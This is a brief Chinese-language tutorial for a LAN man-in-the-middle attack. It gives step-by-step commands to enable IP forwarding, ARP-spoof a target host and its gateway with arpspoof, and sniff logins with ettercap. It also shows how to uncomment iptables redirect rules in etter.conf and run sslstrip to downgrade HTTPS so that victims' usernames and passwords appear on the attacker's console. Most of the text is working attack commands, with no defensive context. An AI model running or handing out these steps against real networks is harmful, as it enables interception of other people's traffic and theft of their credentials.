知识点:
Arpspoof ——》欺骗
Ettercap ——欺骗,Dns欺骗 流量嗅探
环境:
目标机器192.168.1.100
网关:192.168.1.1
流程:
1.echo 1 > /proc/sys/net/ipv4/ip_forward
流量通过自己网卡转发
cat /proc/sys/net/ipv4/ip_forward
如果显示‘1’,则执行成功
2.arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
arp攻击
3.ettercap -Tq -i eth0
截取流量
-Tq 启动文本模式,q代表安静模式
受害过程:当用户访问需要用户密码的网站的时候,需要输入账号密码时(http网站),当受害者点击登陆的时候,账号密码即可回显至控制台,同时回显登陆的网站地址
这个回显的账号密码不一定正确,当用户输错密码的时候点击登陆它仍然回显,也有可能回显的是加密过的密钥,需要自己破译。
如果用户名为中文,返回的用户名字符是一串看似乱码的东西,其实它就是用户名,只需要进行url解码即可
如果不是http而是https怎么办呢?
开启ssh /etc/init.d/ssh start,使用Xshell来连接kali进行操作,比较方便。
打开 /etc/ettercap/etter.conf
截取Linux词条下的
2个if内容,把注释都去掉
if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport”
上面内容原本是由#号的,要去掉注释
它能够把https的连接还原为http
运行Sslstrip -a -f -k
运行后,复制ssh渠道(新建一个控制台)
然后进行欺骗,欺骗之后开始抓包,老一套。
登陆后账号密码即可回显,网站安全防护不同回显的东西也不同。
如果用户忽略证书错误,那么他的账号密码就很危险了。